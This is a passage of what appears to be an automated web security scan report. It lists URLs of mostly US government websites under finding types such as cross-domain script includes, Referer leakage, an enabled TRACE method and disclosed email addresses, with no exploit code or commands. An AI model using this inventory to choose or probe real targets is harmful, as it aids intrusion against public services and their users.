16.7. https://www.humanservices.state.pa.us/Compass.Web/CMHOM.aspx

16.8. https://www.humanservices.state.pa.us/Compass.Web/CPACM.aspx

16.9. https://www.humanservices.state.pa.us/Compass.Web/MenuItems/CompassHelpTool.aspx

16.10. https://www.humanservices.state.pa.us/Compass.Web/MenuItems/LearnAboutCompass.aspx

16.11. https://www.humanservices.state.pa.us/Compass.Web/MenuItems/OtherLanguage.aspx

16.12. https://www.humanservices.state.pa.us/Compass.Web/MenuItems/SeeAllBenefits.aspx

16.13. https://www.humanservices.state.pa.us/Compass.Web/MenuItems/SystemCompatibility.aspx

16.14. https://www.humanservices.state.pa.us/compass.web/MenuItems/ContactUs.aspx

16.15. https://www.humanservices.state.pa.us/compass.web/MenuItems/GeneralInfoFaq.aspx

16.16. https://www.humanservices.state.pa.us/compass.web/MenuItems/SiteMapAfs.aspx

16.17. https://www.humanservices.state.pa.us/compass.web/MenuItems/help.aspx

16.18. https://www.humanservices.state.pa.us/compass.web/Menuitems/ADACompliance.aspx

16.19. https://www.humanservices.state.pa.us/compass.web/Menuitems/BrowserCompat.aspx

16.20. https://www.humanservices.state.pa.us/compass.web/Menuitems/Confidential.aspx

16.21. http://www.nccourts.org/Common/JScript/Common.js

16.22. http://www.portal.state.pa.us/imageserver/plumtree/common/private/js/jsxml/LATEST/PTXML.js

16.23. http://www.txdot.gov/txdoteforms/GetForm

16.24. http://www.utah.gov/js/DD_roundies_0.0.2a-min.js

17. Referer-dependent response

17.1. http://ads.adbrite.com/adserver/vdi/711384

17.2. http://api.twitter.com/1/statuses/user_timeline/okgov.json

17.3. http://emergency.louisiana.gov/ga.js

17.4. http://twitter.com/statuses/user_timeline/IDAHOgov.json

17.5. http://www.facebook.com/plugins/like.php

17.6. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm

18. Cross-domain POST

18.1. http://johncarney.house.gov/

18.2. http://mi.gov/business

18.3. http://milottery.state.mi.us/msl-og-detail.php

18.4. https://olt.custhelp.com/cgi-bin/olt.cfg/php/enduser/chat.php

18.5. http://pa.gov/portal/server.pt

18.6. http://pa.gov/portal/server.pt/community/pa_gov/2966

18.7. http://www.buzgate.org/8.0/ny/fh.html

18.8. http://www.buzgate.org/8.0/ny/fh.html

18.9. http://www.doleta.gov/disability/new_dpn_grants.cfm

18.10. http://www.nist.gov/search-results.cfm

18.11. http://www.nist.gov/srd/onlinelist.htm

18.12. http://www.vsea.org/

18.13. http://www.vsea.org/editorial-lays-out-vermont%26%23039

18.14. http://www.vsea.org/favicon.ico

18.15. http://www.vsea.org/join-vsea

18.16. http://www.vsea.org/join-your-union

18.17. http://www.vsea.org/maine-study-finds-state%26%23039

18.18. http://www.vsea.org/node

18.19. http://www.vsea.org/purchase-vsea-clothing

18.20. http://www.vsea.org/state-hospital%26%23039

18.21. http://www.vsea.org/user/password

18.22. http://www.vsea.org/user/register

19. Cross-domain Referer leakage

19.1. http://cdn.livestream.com/embedfiles/embed-min.js

19.2. http://cm.g.doubleclick.net/pixel

19.3. http://data.ok.gov/packages/shared-map.js

19.4. http://data.osbm.state.nc.us/pls/pbis/dyn_osbmweb_libdatalinks.show

19.5. http://fls.doubleclick.net/activityi

19.6. http://ga.gov/00/home/0,2061,4802,00.html

19.7. http://georgiawildlife.dnr.state.ga.us/content/displaynavigation.asp

19.8. http://googleads.g.doubleclick.net/pagead/ads

19.9. http://googleads.g.doubleclick.net/pagead/ads

19.10. http://googleads.g.doubleclick.net/pagead/ads

19.11. http://home.mcafee.com/Default.aspx

19.12. http://home.mcafee.com/Root/AboutUs.aspx

19.13. http://home.mcafee.com/root/dynamicpage.aspx

19.14. http://image.providesupport.com/js/hic/safe-standard.js

19.15. http://image.providesupport.com/js/hic/safe-standard.js

19.16. http://io9.com/assets/base.v9/js/readability.js

19.17. http://kentucky.gov/feedback.aspx

19.18. http://landmark-project.com/feed2js/feed2js.php

19.19. http://legis.delaware.gov/Legislature.nsf/Lookup/House_Home

19.20. http://legis.delaware.gov/legislature.nsf/Lookup/Divisions_Home

19.21. http://myflorida.custhelp.com/cgi-bin/myflorida.cfg/php/enduser/acct_login.php

19.22. http://myflorida.custhelp.com/cgi-bin/myflorida.cfg/php/enduser/std_alp.php

19.23. https://olt.custhelp.com/cgi-bin/olt.cfg/php/enduser/acct_login.php

19.24. http://pa.gov/portal/server.pt

19.25. http://tomcat2.dot.state.ga.us/ContractsAdministration/index.cfm

19.26. http://tomcat2.dot.state.ga.us/ContractsAdministration/index.cfm

19.27. http://www.adfg.alaska.gov/index.cfm

19.28. http://www.alabama.gov/portal/secondary.jsp

19.29. http://www.alabama.gov/portal/secondary.jsp

19.30. http://www.coloradochannel.net/sites/all/modules/browser_update_popup/js/browser_update_popup.js

19.31. http://www.coloradochannel.net/sites/all/modules/lightbox2/js/lightbox_video.js

19.32. http://www.ct.gov/ctportal/cwp/view.asp

19.33. http://www.dhh.louisiana.gov/offices/page.asp

19.34. http://www.facebook.com/plugins/like.php

19.35. http://www.georgia.gov/external/

19.36. http://www.google.com/search

19.37. http://www.google.com/url

19.38. http://www.in.gov/dwd/WorkOne//

19.39. http://www.leg.state.co.us/clics/clics2011a/cslFrontPages.nsf/Audio

19.40. https://www.mcafeesecure.com/RatingVerify

19.41. http://www.missingkids.com/missingkids/servlet/PageServlet

19.42. http://www.missingkids.com/missingkids/servlet/PageServlet

19.43. http://www.ms.gov/ms_sub_template.jsp

19.44. http://www.nccourts.org/Citizens/GoToCourt/Default.asp

19.45. http://www.nhfishandgame.com/cgi-bin/gl/outdoor.cgi

19.46. http://www.nist.gov/search-results.cfm

19.47. https://www.nrsservicecenter.com/iApp/ret/content/landing.do

19.48. http://www.nv.gov/NV_default4.aspx

19.49. http://www.nysegov.com/citGuide.cfm

19.50. http://www.nysegov.com/citguide.cfm

19.51. https://www.paybill.com/Common/Left.asp

19.52. https://www.scsignon.sc.gov/

19.53. http://www.state.mn.us/portal/mn/jsp/home.do

19.54. https://www.tennesseeanytime.org/pmnout/notice/listByMonth

19.55. http://www.texas.gov/en/search/Pages/results.aspx

19.56. http://www.vsea.org/purchase-vsea-clothing

20. Cross-domain script include

20.1. https://apps.tn.gov/bizreg/

20.2. https://apps.tn.gov/biztax/

20.3. http://az.gov/

20.4. http://az.gov/services_tourism.html

20.5. http://blog.nheconomy.com/

20.6. http://cityofmuscleshoals.com/Default.asp

20.7. http://climate.rutgers.edu/njwxnet/station.php

20.8. http://courts.delaware.gov/Help/fcrecordaccess.stm

20.9. http://data.ok.gov/

20.10. http://data.ok.gov/browse

20.11. http://de.gov/profile.php

20.12. http://de.gov/topics/yourgovernment

20.13. http://digg.com/submit

20.14. http://dola.colorado.gov/dem/index.html

20.15. http://emergency.louisiana.gov/

20.16. http://finance.yahoo.com/q

20.17. http://fls.doubleclick.net/activityi

20.18. http://ga.gov/00/channel_createdate/0,2095,4802_49268007,00.html

20.19. http://ga.gov/00/channel_title/0,2094,4802_13167990,00.html

20.20. http://ga.gov/00/channel_title/0,2094,4802_4965,00.html

20.21. http://ga.gov/00/channel_title/0,2094,4802_4969,00.html

20.22. http://ga.gov/00/channel_title/0,2094,4802_5035,00.html

20.23. http://ga.gov/00/home/0,2061,4802,00.html

20.24. http://ga.gov/00/mobile/0,2783,4802,00.html

20.25. http://googleads.g.doubleclick.net/pagead/ads

20.26. http://googleads.g.doubleclick.net/pagead/ads

20.27. http://gov.louisiana.gov/index.cfm

20.28. http://groups.google.com/grphp

20.29. http://home.mcafee.com/AdviceCenter/Default.aspx

20.30. https://home.mcafee.com/Secure/Protected/Login.aspx

20.31. http://ia.gov/livehelp.html

20.32. http://idaho.gov/

20.33. http://idaho.gov/public/portal/contact.html

20.34. http://idaho.gov/search.html

20.35. http://in.gov/

20.36. http://in.gov/core/agriculture.html

20.37. http://in.gov/core/business.html

20.38. http://in.gov/core/index_pages/void()

20.39. http://in.gov/core/js/arss.css

20.40. http://in.gov/core/online_services.html

20.41. http://in.gov/gov/photo.htm

20.42. http://in.gov/sos/securities/2521.htm

20.43. http://in.gov/spd/2333.htm

20.44. http://in.gov/void()

20.45. http://itunes.apple.com/app/eyes-and-ears-on-kentucky/id422703420

20.46. http://itunes.apple.com/us/app/indiana-dnr/id395591679

20.47. http://itunes.apple.com/us/app/netflix/id363590051

20.48. http://itunes.apple.com/us/app/ri-gov/id374968524

20.49. http://johncarney.house.gov/press-release/rep-carney-statement-budget-agreement

20.50. http://jquery.com/

20.51. http://jqueryui.com/themeroller/

20.52. http://kentucky.gov/Pages/home.aspx

20.53. http://kentucky.gov/feedback.aspx

20.54. http://la.gov/includes/banner/emergencybanner.js

20.55. http://licensingexpress.wordpress.com/

20.56. http://mi.gov/

20.57. http://obm.ohio.gov/document.aspx

20.58. http://oh.gov/

20.59. http://ok.gov/

20.60. http://oregon.gov/

20.61. http://pa.gov/portal/server.pt

20.62. http://pa.gov/portal/server.pt/community/pa_gov/2966

20.63. http://sc.gov/Pages/default.aspx

20.64. https://secure.kentucky.gov/portal/login.aspx

20.65. https://secure.missingkids.com/missingkids/servlet/CybertipServlet

20.66. https://securetransactions.mva.maryland.gov/emvastore/MainMenu.aspx

20.67. http://tn.gov/

20.68. https://txapps.texas.gov/tolapp/txdl/welcome.dl

20.69. https://unitedalert.com/

20.70. http://www.511ia.org/default.asp

20.71. http://www.addthis.com/bookmark.php

20.72. http://www.agriculture.state.tn.us/Marketing.asp

20.73. http://www.alabama.gov/portal/index.jsp

20.74. http://www.alabama.gov/portal/secondary.jsp

20.75. http://www.amberalert.com/en/alerts/state/

20.76. http://www.archives.gov/shop/

20.77. http://www.archives.gov/veterans/evetrecs/index.html

20.78. http://www.archives.gov/veterans/military-service-records/

20.79. http://www.buzgate.org/8.0/ny/fh.html

20.80. http://www.capehenlopenschools.com/education/district/district.php

20.81. http://www.centerdigitalgov.com/center/highlightstory.phtml

20.82. http://www.colorado.gov/

20.83. http://www.cotrip.org/device.htm

20.84. http://www.dds.ga.gov/drivers/DLdata.aspx

20.85. http://www.delmar.k12.de.us/education/district/district.php

20.86. http://www.denvergov.org/tabid/37889/Default.aspx

20.87. http://www.dol.wa.gov/onlinesvcs.html

20.88. http://www.dol.wa.gov/vehicleregistration/

20.89. http://www.dyve.net/jquery/

20.90. http://www.ed.gov/rschstat/landing.jhtml

20.91. http://www.ehawaii.gov/dakine/index.html

20.92. http://www.employment.oregon.gov/EMPLOY/ES/JOB/index.shtml

20.93. http://www.employment.oregon.gov/EMPLOY/STORIES/online_filing_success.shtml

20.94. http://www.employment.oregon.gov/images/doesNotExist.png

20.95. http://www.facebook.com/TeamHaslam

20.96. http://www.facebook.com/WSDOL

20.97. http://www.facebook.com/note.php

20.98. http://www.facebook.com/ohiodivisionofwatercraft

20.99. http://www.facebook.com/photo.php

20.100. http://www.facebook.com/plugins/like.php

20.101. http://www.facebook.com/share.php

20.102. http://www.georgia.gov/external/

20.103. http://www.georgia.gov/gta/translate/0,2678,4802,00.html

20.104. http://www.georgiawildlife.com/node/1873

20.105. http://www.goccp.maryland.gov/lists/index.php

20.106. http://www.gov.state.la.us/index.cfm

20.107. http://www.in.gov/ai/errors/dwd_404.html

20.108. http://www.in.gov/apps/options/email.aspx

20.109. http://www.in.gov/apps/options/rate.aspx

20.110. http://www.in.gov/apps/options/suggestion.aspx

20.111. http://www.in.gov/core/faqs.html

20.112. http://www.in.gov/dhs/3163.htm

20.113. http://www.in.gov/dnr/6406.htm

20.114. http://www.in.gov/dwd/WorkOne//

20.115. http://www.in.gov/idem/hoosierscare/5601.htm

20.116. http://www.in.gov/isda/2435.htm

20.117. http://www.in.gov/oed/2367.htm

20.118. http://www.in.gov/oed/2572.htm

20.119. http://www.in.gov/pla/license.htm

20.120. http://www.in.gov/recycle/5636.htm

20.121. http://www.inshapeindiana.org/

20.122. http://www.iowa.gov/livehelp.html

20.123. http://www.kansas.gov/index.php

20.124. http://www.kansas.gov/search.php

20.125. http://www.kansas.gov/services/

20.126. http://www.kodakgallery.com/gallery/lp/2010/visit_florida/vacation_photos.jsp

20.127. http://www.ksde.org/Default.aspx

20.128. https://www.mcafeesecure.com/RatingVerify

20.129. http://www.mcgi.state.mi.us/milocator/default.aspx

20.130. http://www.mema.state.md.us/MEMA/content_page.jsp

20.131. http://www.michigan.org/Partners/Default.aspx

20.132. http://www.missingkids.com/missingkids/servlet/NewsEventServlet

20.133. http://www.missingkids.com/missingkids/servlet/PageServlet

20.134. http://www.missingkids.com/missingkids/servlet/PubCaseSearchServlet

20.135. http://www.missingkids.com/missingkids/servlet/PublicHomeServlet

20.136. http://www.missingkids.com/missingkids/servlet/StayInformedServlet

20.137. http://www.mo.gov/my-government/transparency-accountability/meetings/details.php

20.138. http://www.molottery.com/winningNumbers.do

20.139. http://www.money-rates.com/news/10-best-states-for-making-a-living.htm

20.140. http://www.myflorida.com/

20.141. http://www.nh.gov/maps/traffic/index.html

20.142. http://www.nhfishandgame.com/cgi-bin/gl/outdoor.cgi

20.143. http://www.nist.gov/srd/onlinelist.htm

20.144. https://www.nrsservicecenter.com/iApp/ret/cmd/RetLogin

20.145. https://www.nrsservicecenter.com/iApp/ret/content/landing.do

20.146. https://www.nrsservicecenter.com/iApp/ret/landing.do

20.147. https://www.nrsservicecenter.com/iApp/ret/showPage.do

20.148. http://www.nysenate.gov/

20.149. http://www.nysenate.gov/calendar

20.150. http://www.odh.ohio.gov/forms/formfinder.aspx

20.151. http://www.opensource.org/licenses/mit-license.php

20.152. http://www.osc.state.ny.us/

20.153. https://www.paybill.com/Common/Left.asp

20.154. http://www.qualityinfo.org/olmisj/OlmisZine

20.155. http://www.real.com/realplayer

20.156. https://www.scsignon.sc.gov/

20.157. https://www.scsignon.sc.gov/Common/HelpWindow.aspx

20.158. https://www.scsignon.sc.gov/Eng/Secured/Security/ForgotPassword.aspx

20.159. https://www.scsignon.sc.gov/Eng/Secured/Security/ForgotUserName.aspx

20.160. https://www.scsignon.sc.gov/Login.aspx

20.161. https://www.scsignon.sc.gov/WebResource.axd

20.162. https://www.scsignon.sc.gov/eng/Secured/Security/CreateUserName.aspx

20.163. http://www.servicelocator.org/

20.164. http://www.sha.maryland.gov/Index.aspx

20.165. http://www.state.mn.us/portal/mn/jsp/home.do

20.166. http://www.state.nj.us/education/

20.167. http://www.state.nj.us/education/parents/

20.168. https://www.tennesseeanytime.org/biztax/

20.169. https://www.tennesseeanytime.org/paams-app/index.htm

20.170. https://www.tennesseeanytime.org/pmnout/notice/listByMonth

20.171. http://www.thestreet.com/story/11081894/1/netflixs-rising-stock-defies-growing-risks.html

20.172. http://www.tn.gov/bopp/bopp_bo_contents.htm

20.173. http://www.tn.gov/governor/

20.174. http://www.tn.gov/maintenance.html

20.175. http://www.tn.gov/revenue/forms/index.htm

20.176. http://www.tn.gov/revenue/onlinefiling/

20.177. http://www.tn.gov/revenue/onlinefiling/businesstax/biztaxonlinefiling.htm

20.178. http://www.tn.gov/revenue/onlinefiling/businesstax/biztaxregister.htm

20.179. http://www.tn.gov/revenue/onlinefiling/businesstax/bustaxefile.htm

20.180. http://www.tn.gov/revenue/onlinefiling/onlineregister.htm

20.181. http://www.tn.gov/revenue/onlinefiling/salesanduse/electronicfiling.htm

20.182. http://www.tn.gov/revenue/onlinefiling/salesanduse/salestaxefile.htm

20.183. http://www.ulsystem.net/index.cfm

20.184. http://www.utah.gov/governor/news_media/article.html

20.185. http://www.utah.gov/index.html

20.186. http://www.utah.gov/pmn/sitemap/notice/67945.html

20.187. http://www.utah.gov/services/

20.188. http://www.utah.gov/services/business.html

20.189. http://www.utah.gov/services/financial.html

20.190. http://www.utah.gov/services/index.html

20.191. http://www.utah.gov/whatsnew.html

20.192. http://www.visitflorida.com/facebook_logged_in.php

20.193. http://www.visitflorida.com/florida_vacation_auction/auction_details.php

20.194. http://www.visitflorida.com/floridalive

20.195. http://www.vtlmi.info/

20.196. http://www.wor710.com/topic/play_window.php

21. TRACE method is enabled

21.1. http://services.ito.state.il.us/

21.2. http://www.vsea.org/

22. Email addresses disclosed

22.1. http://admin.state.nh.us/hr/js/HM_ScriptDOM.js

22.2. http://admin.state.nh.us/hr/retirement_benefits.html

22.3. http://admin.state.nh.us/wellness/scripts/textsizer.js

22.4. http://ads.adbrite.com/adserver/vdi/711384

22.5. http://agency.governmentjobs.com/tennessee/default.cfm

22.6. http://alaska.gov/

22.7. http://alaska.gov/quote.html

22.8. http://amix.dk/

22.9. http://api.flickr.com/services/feeds/photoset.gne

22.10. https://apps.tn.gov/apps/js/calendar1.js

22.11. https://apps.tn.gov/apps/js/controls.js

22.12. https://apps.tn.gov/apps/js/dragdrop.js

22.13. http://assembly.state.ny.us/

22.14. http://assembly.state.ny.us/leg/

22.15. http://assembly.state.ny.us/mem/

22.16. https://assist.dhss.delaware.gov/PGM/ASP/SACOM.asp

22.17. http://az.gov/static/portal/js/CalendarPopup.js

22.18. http://blog.nheconomy.com/

22.19. http://ca.gov/images/home/golden_gateway.f4v

22.20. http://cache.pack.google.com/edgedl/chrome/install/696.60_648.205/chrome_updater.exe

22.21. http://cdnb1.kodakgallery.com/A/consolidatedFiles/common_consolidated.min.v-2028399759.js

22.22. http://cityofmuscleshoals.com/Default.asp

22.23. http://climate.rutgers.edu/njwxnet/station.php

22.24. http://courts.delaware.gov/

22.25. http://data.osbm.state.nc.us/pls/pbis/dyn_hr_staffweb.show

22.26. http://data.osbm.state.nc.us/pls/pbis/dyn_osbmweb_libdatalinks.show

22.27. http://data.osbm.state.nc.us/pls/pbis/dyn_osbmweb_libevents.show

22.28. http://data.osbm.state.nc.us/pls/pbis/dyn_osbmweb_libforms.show

22.29. http://data.osbm.state.nc.us/pls/pbis/dyn_osbmweb_libmemos.show

22.30. http://data.osbm.state.nc.us/pls/pbis/dyn_osbmweb_libnews.show

22.31. http://data.osbm.state.nc.us/pls/pbis/dyn_osbmweb_libother_one.show

22.32. http://data.osbm.state.nc.us/pls/pbis/dyn_osbmweb_libpubs.show

22.33. http://data.osbm.state.nc.us/pls/pbis/dyn_osbmweb_libtopicgroups.show

22.34. https://dhr.ky.gov/DHRWeb/RS

22.35. http://dnr.maryland.gov/service/

22.36. http://dola.colorado.gov/dem/index.html

22.37. http://fastcache.gawkerassets.com/assets/base.v10/static/base.v10.widget.20110427.js

22.38. https://fin.oaks.ohio.gov/psp/FNPRD/

22.39. http://ga.gov/gta/mc/includes/omniture/s_code.js

22.40. https://georgiawildlife.dnr.state.ga.us/service/login1.asp

22.41. https://hcm.oaks.ohio.gov/psp/HCPRD/

22.42. http://home.mcafee.com/Root/AboutUs.aspx

22.43. https://home.mcafee.com/Scripts/instant_invite/ProActiveChatSmartButton.js

22.44. http://housing.utah.gov/news/

22.45. http://ia.gov/

22.46. http://ia.gov/js/jq-cookies.js

22.47. http://idaho.gov/appskins/idahogov200902/javascript/equalcolumns.js

22.48. http://in.gov/core/js/agency.js

22.49. http://in.gov/core/js/jquery.slideshow.js

22.50. http://in.gov/core/js/jquery.swapimage.min.js

22.51. http://in.gov/core/js/portal_scripts.js

22.52. https://joblink.alabama.gov/ada/works/WorkforceCenter.cfm

22.53. http://johncarney.house.gov/

22.54. http://johncarney.house.gov/press-release/rep-carney-statement-budget-agreement

22.55. http://johncarney.house.gov/profiles/house/themes/house/js/jquery-validation-engine.js

22.56. http://kentucky.gov/SiteCollectionDocuments/scripts/jquery/cookie/jquery.cookie.js

22.57. http://kentucky.gov/SiteCollectionDocuments/scripts/jquery/fontsizer/jquery.fontsizer.js

22.58. http://kentucky.gov/SiteCollectionDocuments/scripts/jquery/innerfade/jquery.innerfade.js

22.59. http://la.gov/

22.60. http://la.gov/Government/Boards_and_Commissions/

22.61. http://legis.state.la.us/contact.htm

22.62. http://legis.state.la.us/main.asp

22.63. http://licensingexpress.wordpress.com/

22.64. http://maps.google.com/maps/gx

22.65. http://maps.google.com/maps/gx

22.66. http://maps.google.com/maps/gx

22.67. http://maps.google.com/maps/gx

22.68. http://maps.google.com/maps/sf

22.69. http://maps.google.com/maps/sf

22.70. http://maps.google.com/maps/sf

22.71. http://maps.google.com/maps/sf

22.72. http://mi.gov/js/jquery.cross-slide.min.0.6.2.js

22.73. http://mi.gov/js/jquery.cross-slide.min.js

22.74. http://mibid.bidcorp.com/ActiveAuctions.aspx

22.75. http://mibid.bidcorp.com/AuctionDetails.aspx

22.76. http://mibid.bidcorp.com/EndingAuctions.aspx

22.77. https://mibid.bidcorp.com/Login.aspx

22.78. http://nc.gov/1222,1222,Online_Services,Online_Services.html

22.79. http://nc.gov/directory.aspx

22.80. http://ncchildcaresearch.dhhs.state.nc.us/search.asp

22.81. http://newmexico.gov/

22.82. https://nhlicenses.nh.gov/MyLicense%20Enterprise/

22.83. https://nhlicenses2.nh.gov/cgi-bin/professional/nhprof/license.pl

22.84. https://nhlicenses2.nh.gov/cgi-bin/professional/nhprof/license.pl

22.85. https://nhlicenses2.nh.gov/cgi-bin/professional/nhprof/license.pl

22.86. https://nhlicenses2.nh.gov/cgi-bin/professional/nhprof/training.pl

22.87. https://nhlicenses2.nh.gov/professional/

22.88. http://nv.gov/GovPR.aspx

22.89. http://nv.gov/WorkArea/java/ektron.js

22.90. http://nv.gov/ext/adapter/ext/ext-base.js

22.91. http://nv.gov/ext/ext-all.js

22.92. http://nv.gov/ext/resources/css/ext-all.css

22.93. http://nv.gov/ext/resources/css/xtheme-blue.css

22.94. http://ohiodnr.com/controls/SolpartMenu/spmenu.js

22.95. http://ohiodnr.com/watercraft/BuckeyeBoater/tabid/2200/Default.aspx

22.96. http://ohiodnr.com/watercraft/RegistrationandTitling/tabid/2774/Default.aspx

22.97. http://phonebook.iowa.gov/agency.aspx

22.98. http://phonebook.iowa.gov/info.aspx

22.99. http://phonebook.iowa.gov/js/jq-cookies.js

22.100. http://sc.gov/Style%20Library/scripts/jquery.cookie.js

22.101. http://serverapi.arcgisonline.com/jsapi/arcgis/

22.102. http://sos.ri.gov/business/

22.103. http://sos.ri.gov/business/apostilles/

22.104. http://sos.ri.gov/openmeetings/

22.105. http://stayconnected.hawaii.gov/

22.106. http://tn.gov/

22.107. http://tn.gov/apps/js/controls.js

22.108. http://tn.gov/apps/js/dragdrop.js

22.109. http://tomcat2.dot.state.ga.us/ContractsAdministration/index.cfm

22.110. https://treas-secure.treas.state.mi.us/eservice_enu/19230/scripts/swecommon.js

22.111. https://txapps.texas.gov/tolapp/viewandpay

22.112. http://webapps6.doc.state.nc.us/opi/offenderescapesearch.do

22.113. http://webapps6.doc.state.nc.us/opi/offenderreleasesearch.do

22.114. http://www.511ia.org/default.asp

22.115. http://www.adfg.alaska.gov/index.cfm

22.116. http://www.ag.ny.gov/

22.117. https://www.alabamainteractive.org/abc_license/

22.118. https://www.alabamainteractive.org/arecmenu/welcome.action

22.119. http://www.archives.gov/includes/javascript/DD_roundies_0.0.2a-min.js

22.120. http://www.archives.gov/veterans/military-service-records/

22.121. https://www.bbb.org/online/consumer/cks.aspx

22.122. http://www.bea.gov/bea/regional/reis/default.cfm

22.123. http://www.blogs.va.gov/VAntage/

22.124. http://www.budget.state.pa.us/portal/server.pt/community/current_and_proposed_commonwealth_budgets/4566

22.125. http://www.colorado.gov/apps/epostcard/servlet/begin

22.126. http://www.colorado.gov/apps/feedback/servlet/begin

22.127. http://www.coloradochannel.net/sites/all/modules/nice_menus/superfish/js/jquery.hoverIntent.minified.js

22.128. http://www.ct.gov/

22.129. http://www.ct.gov/ctportal/cwp/view.asp

22.130. http://www.ct.gov/ctportal/site/default.asp

22.131. http://www.ct.gov/ctportal/taxonomy/taxonomy.asp

22.132. http://www.delmar.k12.de.us/education/district/district.php

22.133. http://www.dhh.louisiana.gov/links.asp

22.134. http://www.dhh.louisiana.gov/offices/page.asp

22.135. http://www.dhss.delaware.gov/dhss/stylesheets/print.css

22.136. http://www.dms.myflorida.com/business_operations/state_purchasing/myflorida_marketplace

22.137. http://www.dms.myflorida.com/business_operations/state_purchasing/myflorida_marketplace/mfmp_buyers

22.138. http://www.dms.myflorida.com/business_operations/state_purchasing/myflorida_marketplace/mfmp_buyers/online_purchasing

22.139. http://www.dms.myflorida.com/design/dev/javascript/jquery.dataTables.js

22.140. http://www.dms.myflorida.com/design/dev/javascript/prototype.js

22.141. http://www.dms.myflorida.com/extension/ezdatetimeselect/design/standard/javascript/calendar.js

22.142. http://www.dms.myflorida.com/extension/ezdatetimeselect/design/standard/javascript/lang/calendar-en.js

22.143. http://www.dms.myflorida.com/mfmp

22.144. http://www.doc.louisiana.gov/view.php

22.145. http://www.doc.state.nc.us/clemency/

22.146. http://www.dol.wa.gov/driverslicense/guide.html

22.147. http://www.doleta.gov/disability/new_dpn_grants.cfm

22.148. http://www.dyve.net/jquery/

22.149. http://www.epa.ohio.gov/Default.aspx

22.150. http://www.georgiawildlife.com/

22.151. http://www.governmentjobs.com//js/wddx.js

22.152. http://www.governor.ny.gov/

22.153. http://www.governor.ny.gov/js/js_6bd6cece2835e62cf45d64d29e58747f.js

22.154. http://www.healthynh.com/inc/menusNeue.phpi

22.155. http://www.healthynh.com/index-fhc.php

22.156. https://www.humanservices.state.pa.us/Compass.Web/CPACM.aspx

22.157. http://www.illinois.gov/PressReleases/PressReleasesSearch.cfm

22.158. http://www.in.gov/dnr/6406.htm

22.159. http://www.in.gov/portal/global/javascript/9.js

22.160. http://www.inshapeindiana.org/

22.161. http://www.kodakgallery.com/gallery/lp/2010/visit_florida/vacation_photos.jsp

22.162. http://www.ksde.org/Default.aspx

22.163. http://www.mcgi.state.mi.us/milocator/default.aspx

22.164. http://www.mema.state.md.us/MEMA/content_page.jsp

22.165. http://www.mo.gov/my-government/transparency-accountability/meetings/details.php

22.166. http://www.mo.gov/wp-content/themes/Mo.gov/js/compiled/compiled-js.php

22.167. http://www.nh.gov/accountancy/

22.168. http://www.nh.gov/dot/nhrideshare/

22.169. http://www.nh.gov/scripts/textsizer.js

22.170. http://www.nhfishandgame.com/cgi-bin/gl/outdoor.cgi

22.171. http://www.nist.gov/search-results.cfm

22.172. http://www.nist.gov/srd/onlinelist.htm

22.173. http://www.nmcpr.state.nm.us/nmac/

22.174. http://www.nv.gov/NV_default4.aspx

22.175. http://www.nv.gov/WorkArea/java/ektron.js

22.176. http://www.nv.gov/ext/adapter/ext/ext-base.js

22.177. http://www.nv.gov/ext/ext-all.js

22.178. http://www.nv.gov/ext/resources/css/ext-all.css

22.179. http://www.nv.gov/ext/resources/css/xtheme-blue.css

22.180. http://www.nyfirst.ny.gov/

22.181. http://www.nysenate.gov/files/js/js_62120c49af6ee45b927235f2cfb845ee.js

22.182. http://www.obout.com/t2/ht_howto.aspx

22.183. http://www.ode.state.or.us/search/results/

22.184. http://www.opensource.org/licenses/mit-license.php

22.185. http://www.osbm.state.nc.us/js/helperplugin.js

22.186. http://www.osbm.state.nc.us/ncosbm/facts_and_figures/socioeconomic_data/census_home.shtm

22.187. https://www.paybill.com/payccu/

22.188. http://www.ri.gov/js/fontsizer.js

22.189. http://www.ri.gov/js/jquery.cdc.ticker.js

22.190. http://www.ri.gov/js/jquery_cookie.js

22.191. http://www.ri.gov/plugins/mozilla_search.xml

22.192. http://www.servicelocator.org/

22.193. http://www.sha.maryland.gov/Index.aspx

22.194. http://www.sos.idaho.gov/elect/eleindex.htm

22.195. http://www.sos.idaho.gov/elect/results.htm

22.196. http://www.state.sd.us/calendar/index.cfm

22.197. https://www.tennesseeanytime.org/apps/js/controls.js

22.198. https://www.tennesseeanytime.org/apps/js/dragdrop.js

22.199. https://www.tennesseeanytime.org/apps/js/prototype.lite.js

22.200. https://www.tennesseeanytime.org/biztax/

22.201. https://www.tennesseeanytime.org/pmnout/notice/listByMonth

22.202. http://www.texas.gov/en/Pages/default.aspx

22.203. http://www.tn.gov/apps/js/controls.js

22.204. http://www.tn.gov/apps/js/dragdrop.js

22.205. http://www.tn.gov/bopp/bopp_bo_contents.htm

22.206. http://www.tn.gov/governor/

22.207. http://www.tn.gov/maintenance.html

22.208. http://www.tn.gov/revenue/forms/index.htm

22.209. http://www.tn.gov/revenue/onlinefiling/

22.210. http://www.tn.gov/revenue/onlinefiling/businesstax/biztaxonlinefiling.htm

22.211. http://www.tn.gov/revenue/onlinefiling/businesstax/biztaxregister.htm

22.212. http://www.tn.gov/revenue/onlinefiling/businesstax/bustaxefile.htm

22.213. http://www.tn.gov/revenue/onlinefiling/onlineregister.htm

22.214. http://www.tn.gov/revenue/onlinefiling/salesanduse/electronicfiling.htm

22.215. http://www.tn.gov/revenue/onlinefiling/salesanduse/salestaxefile.htm

22.216. http://www.treasury.louisiana.gov/Home%20Pages/BondCommission.aspx

22.217. http://www.utah.gov/governor/news_media/article.html

22.218. http://www.utah.gov/js/DD_roundies_0.0.2a-min.js

22.219. http://www.utah.gov/js/jquery.scrollable.min.js

22.220. http://www.utah.gov/pmn/sitemap/notice/67945.html

22.221. https://www.vermontjoblink.com/ada

22.222. https://www.vermontjoblink.com/ada/

22.223. https://www.vermontjoblink.com/ada/404/404_qry.cfm

22.224. https://www.vermontjoblink.com/ada/customization/Vermont/documents/eeoislaw.cfm

22.225. https://www.vermontjoblink.com/ada/customization/Vermont/documents/privacy.cfm

22.226. https://www.vermontjoblink.com/ada/customization/Vermont/favicon.ico

22.227. https://www.vermontjoblink.com/ada/customization/Vermont/images/1p.gif

22.228. https://www.vermontjoblink.com/ada/customization/Vermont/images/crop_hump2.jpg

22.229. https://www.vermontjoblink.com/ada/customization/Vermont/images/statebullet.png

22.230. https://www.vermontjoblink.com/ada/customization/Vermont/images/vt_logo.gif

22.231. https://www.vermontjoblink.com/ada/default.cfm

22.232. https://www.vermontjoblink.com/ada/etp/etp_newuser_dsp.cfm

22.233. https://www.vermontjoblink.com/ada/global/images/1p.gif

